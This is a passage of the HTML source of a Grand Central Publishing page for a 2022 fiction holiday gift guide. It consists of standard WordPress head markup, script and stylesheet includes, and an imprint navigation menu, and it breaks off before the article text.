<!DOCTYPE html>
<html lang="en-US">
	<head>
		<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="google-site-verification" content="85wAGAWAuJVKY63Av9XQL_d8G9S3oJQ9FIKRL_p_NnA" />
<meta name="msvalidate.01" content="0051B8D8511A2B9F4DE35FC989DC79B8" />
<meta name="p:domain_verify" content="d17b1f4fbc23ea8e105438f14592909f"/>
<link rel="profile" href="http://gmpg.org/xfn/11">
<title>2022 Holiday Gift Guide: Fiction | Grand Central Publishing</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//static.srcspot.com' />
<link rel='dns-prefetch' href='//launcher.zo.la' />
<link rel='dns-prefetch' href='//platform.twitter.com' />
<link rel='dns-prefetch' href='//unpkg.com' />
<link rel='dns-prefetch' href='//cdnjs.cloudflare.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Hachette Book Group &raquo; Feed" href="https://www.grandcentralpublishing.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Hachette Book Group &raquo; Comments Feed" href="https://www.grandcentralpublishing.com/comments/feed/" />
<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.grandcentralpublishing.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.0.3"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://www.grandcentralpublishing.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.3' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='mediaelement-css'  href='https://www.grandcentralpublishing.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.16' type='text/css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css'  href='https://www.grandcentralpublishing.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.0.3' type='text/css' media='all' />
<style id='global-styles-inline-css' type='text/css'>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</style>
<style id='hachette-plugin-campaign-view-variables-inline-css' type='text/css'>
	.campaign-view {
		--campaign-view-font-family: 'Source Sans Pro', helvetica, sans-serif, sans-serif;
		--campaign-view-primary-color: inherit;
		--campaign-view-secondary-color: inherit;
	}
</style>
<link rel='stylesheet' id='hachette-site-css-css'  href='https://www.grandcentralpublishing.com/wp-content/themes/hachette/static/css/hachette-site.min.css?ver=8fec604ac362970199bc' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-all-domains-css-css'  href='https://www.grandcentralpublishing.com/wp-content/themes/hachette-book-group/client/build/css/lens-hbg-all-domains.css?ver=58e1dc109658eac8e662' type='text/css' media='all' />
<link rel='stylesheet' id='hachette-lens-css-css'  href='https://www.grandcentralpublishing.com/wp-content/themes/hachette-book-group/client/build/css/lens-grand-central-publishing.css?ver=58e1dc109658eac8e662' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-google-fonts-source-sans-css'  href='https://fonts.googleapis.com/css?family=Source+Sans+Pro%3A400%2C600%2C700&#038;ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-leaflet-css-css'  href='https://unpkg.com/leaflet@1.7.1/dist/leaflet.css?ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://www.grandcentralpublishing.com/wp-content/mu-plugins/jetpack-11.4/css/jetpack.css?ver=11.4' type='text/css' media='all' />
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script>
<script type='text/javascript' src='https://www.grandcentralpublishing.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/Swiper/8.2.4/swiper-bundle.min.js?ver=8.2.4' id='hbg-swiper-js-js'></script>
<script type='text/javascript' src='https://static.srcspot.com/libs/brittney.js?ver=0.1.0' id='mimecast-script-js'></script>
<script type='text/javascript' src='https://launcher.zo.la/assets/zbwidget-launcher-0.1.0.js?ver=0.1.0' id='zola-widget-launcher-js'></script>
<script type='text/javascript' src='https://unpkg.com/leaflet@1.7.1/dist/leaflet.js?ver=1.0' id='hachette-leaflet-js-js'></script>
<link rel="https://api.w.org/" href="https://www.grandcentralpublishing.com/wp-json/" /><link rel="alternate" type="application/json" href="https://www.grandcentralpublishing.com/wp-json/wp/v2/posts/1273837" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.grandcentralpublishing.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.grandcentralpublishing.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 6.0.3" />
<link rel="canonical" href="https://www.grandcentralpublishing.com/articles/2022-holiday-gift-guide-fiction/" />
<link rel='shortlink' href='https://www.grandcentralpublishing.com/?p=1273837' />
<link rel="alternate" type="application/json+oembed" href="https://www.grandcentralpublishing.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.grandcentralpublishing.com%2Farticles%2F2022-holiday-gift-guide-fiction%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.grandcentralpublishing.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.grandcentralpublishing.com%2Farticles%2F2022-holiday-gift-guide-fiction%2F&#038;format=xml" />
<style>img#wpstats{display:none}</style>
				<script>
				window.dataLayer = window.dataLayer || [];
				window.dataLayer.push(
					{"imprint":"grand-central-publishing","genre":"","genreSecondary":"","genreTertiary":"","format":""}				);
			</script>
		
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="2022 Holiday Gift Guide: Fiction" />
<meta property="og:url" content="https://www.grandcentralpublishing.com/articles/2022-holiday-gift-guide-fiction/" />
<meta property="og:description" content="&nbsp; Thought-provoking cli-fi, steamy romance, feel-good fiction and more &#8211; these novels will keep book clubs talking well into the new year. &nbsp; &nbsp;" />
<meta property="article:published_time" content="2022-11-01T18:18:02+00:00" />
<meta property="article:modified_time" content="2022-11-01T18:18:02+00:00" />
<meta property="og:site_name" content="Grand Central Publishing" />
<meta property="og:image" content="https://www.grandcentralpublishing.com/wp-content/uploads/2022/10/10.png?fit=1200%2C628" />
<meta property="og:image:width" content="1200" />
<meta property="og:image:height" content="628" />
<meta property="og:image:alt" content="" />
<meta property="og:locale" content="en_US" />
<meta name="twitter:text:title" content="2022 Holiday Gift Guide: Fiction" />
<meta name="twitter:image" content="https://www.grandcentralpublishing.com/wp-content/uploads/2022/10/10.png?fit=1200%2C628&#038;w=640" />
<meta name="twitter:card" content="summary_large_image" />

<!-- End Jetpack Open Graph Tags -->
<link rel="icon" href="https://www.grandcentralpublishing.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=32%2C32" sizes="32x32" />
<link rel="icon" href="https://www.grandcentralpublishing.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=192%2C192" sizes="192x192" />
<link rel="apple-touch-icon" href="https://www.grandcentralpublishing.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=180%2C180" />
<meta name="msapplication-TileImage" content="https://www.grandcentralpublishing.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=270%2C270" />
		<style type="text/css" id="wp-custom-css">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</style>
			</head>
	<body class="post-template-default single single-post postid-1273837 single-format-standard grandcentralpublishing">
				<div id="page" class="site single-post page imprint">
			<header class="site-header">
	<nav class="site-header__nav swappable" data-swap-location=".imprint-header__menu" data-swap-method="append" data-swap-max="m">
		<a href="https://www.hachettebookgroup.com/">
			<div class="site-header__desktop-logo imprint__global-logo ">
				
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 59.72 59.73" role="img" aria-labelledby="title-hachette-logo-1138338925  desc-hachette-logo-2802472757">
	<title id="title-hachette-logo-1138338925">Hachette Logo</title>
	<desc id="desc-hachette-logo-2802472757">Hachette Logo</desc>
	<polygon role="presentation" class="logo-cls-1" points="59.72 59.73 59.72 0 36.93 0 36.93 4.33 55.4 4.33 55.4 55.4 41.26 55.4 41.26 36.93 18.46 36.93 18.46 41.26 36.93 41.26 36.93 59.73 59.72 59.73"/>
	<polygon role="presentation" class="logo-cls-1" points="22.79 18.47 41.26 18.47 41.26 22.79 18.47 22.79 18.47 4.33 4.33 4.33 4.33 55.4 22.79 55.4 22.79 59.73 0 59.73 0 0 22.79 0 22.79 18.47"/></svg>
			</div>
		</a>
		<div class="menu-imprint-nav-container"><ul id="menu-hachette-primary-menu" class="menu site-header__menu" data-toggle-element="site-header__mobile-menu" data-toggle-block="site-header__mobile-menu"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genres/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Genres">Genres</a><span id="expand-site-header__sub-menu-1635868556" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1635868556" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1635868556" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3745544130  desc-arrow-1807704457">
	<title id="titlet-arrow-3745544130">Arrow Icon</title>
	<desc id="desc-arrow-1807704457">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1635868556" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1635868556"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/childrens-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Children&#039;s Books">Children&#039;s Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/cooking/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Cooking">Cooking</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/fiction/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Fiction">Fiction</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/mind-body-spirit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mind, Body, Spirit">Mind, Body, Spirit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/mystery-thriller/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mystery &amp; Thriller">Mystery &amp; Thriller</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/nonfiction/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Nonfiction">Nonfiction</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/romance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Romance">Romance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/sci-fi-fantasy/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Sci-Fi &amp; Fantasy">Sci-Fi &amp; Fantasy</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/teen-young-adult/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Teen &amp; Young Adult">Teen &amp; Young Adult</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/genre-category/travel/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Travel">Travel</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/contributor/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Authors">Authors</a><span id="expand-site-header__sub-menu-1495607574" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1495607574" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1495607574" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1710145539  desc-arrow-3089275410">
	<title id="titlet-arrow-1710145539">Arrow Icon</title>
	<desc id="desc-arrow-3089275410">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1495607574" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1495607574"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/contributor/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Our Authors">Our Authors</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/author-events/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Author Events">Author Events</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/imprints/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Imprints">Imprints</a><span id="expand-site-header__sub-menu-1046943416" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1046943416" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1046943416" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3739177018  desc-arrow-3458159665">
	<title id="titlet-arrow-3739177018">Arrow Icon</title>
	<desc id="desc-arrow-3458159665">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1046943416" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1046943416"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Grand Central Publishing">Grand Central Publishing</a><span id="expand-site-header__sub-menu-1756113895" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1756113895" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1756113895" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2566061122  desc-arrow-1024647508">
	<title id="titlet-arrow-2566061122">Arrow Icon</title>
	<desc id="desc-arrow-1024647508">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1756113895" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1756113895"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/balance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Balance">Balance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/grand-central-publishing/forever/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Forever / Forever Yours">Forever / Forever Yours</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/grand-central-publishing/legacy-lit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Legacy Lit">Legacy Lit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/grand-central-publishing/twelve/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Twelve">Twelve</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/orbit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Orbit Publishing">Orbit Publishing</a><span id="expand-site-header__sub-menu-1739217219" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1739217219" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1739217219" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2424212420  desc-arrow-3211829037">
	<title id="titlet-arrow-2424212420">Arrow Icon</title>
	<desc id="desc-arrow-3211829037">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1739217219" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1739217219"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/orbit/page/orbit-catalog/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Orbit">Orbit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/redhook/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Redhook">Redhook</a></span></li>	</ul>
</li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-audio/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Audio">Hachette Audio</a></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Nashville">Hachette Nashville</a><span id="expand-site-header__sub-menu-1612601105" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1612601105" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1612601105" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2744798454  desc-arrow-2460811786">
	<title id="titlet-arrow-2744798454">Arrow Icon</title>
	<desc id="desc-arrow-2460811786">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1612601105" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1612601105"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/center-street/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Center Street">Center Street</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/faithwords/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="FaithWords">FaithWords</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/worthy-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Worthy Books">Worthy Books</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little, Brown and Company">Little, Brown and Company</a><span id="expand-site-header__sub-menu-1482470271" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1482470271" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1482470271" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2776489030  desc-arrow-3615384993">
	<title id="titlet-arrow-2776489030">Arrow Icon</title>
	<desc id="desc-arrow-3615384993">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1482470271" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1482470271"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/back-bay-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Back Bay Books">Back Bay Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/little-brown-spark/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little Brown Spark">Little Brown Spark</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/mulholland-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mulholland Books">Mulholland Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/voracious/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Voracious">Voracious</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little, Brown Books for Young Readers">Little, Brown Books for Young Readers</a><span id="expand-site-header__sub-menu-302793007" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-302793007" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-302793007" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2071318939  desc-arrow-4124254634">
	<title id="titlet-arrow-2071318939">Arrow Icon</title>
	<desc id="desc-arrow-4124254634">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-302793007" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-302793007"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/christy-ottaviano-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Christy Ottaviano Books">Christy Ottaviano Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/jimmy-patterson/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="JIMMY Patterson">JIMMY Patterson</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/lb-kids/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="LB Kids">LB Kids</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/poppy/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Poppy">Poppy</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.workman.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Workman Publishing">Workman Publishing</a><span id="expand-site-header__sub-menu-1526159705" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1526159705" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1526159705" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1933740728  desc-arrow-2523932666">
	<title id="titlet-arrow-1933740728">Arrow Icon</title>
	<desc id="desc-arrow-2523932666">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1526159705" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1526159705"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Workman">Workman</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.pageaday.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Workman Calendars">Workman Calendars</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com/kids" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Workman Kids">Workman Kids</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com/imprints/algonquin" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Algonquin Books of Chapel Hill">Algonquin Books of Chapel Hill</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com/imprints/algonquin-young-readers" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Algonquin Young Readers">Algonquin Young Readers</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com/imprints/artisan" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Artisan">Artisan</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.timberpress.com" data-type="link-event" data-category="Main Nav" data-action="Click on 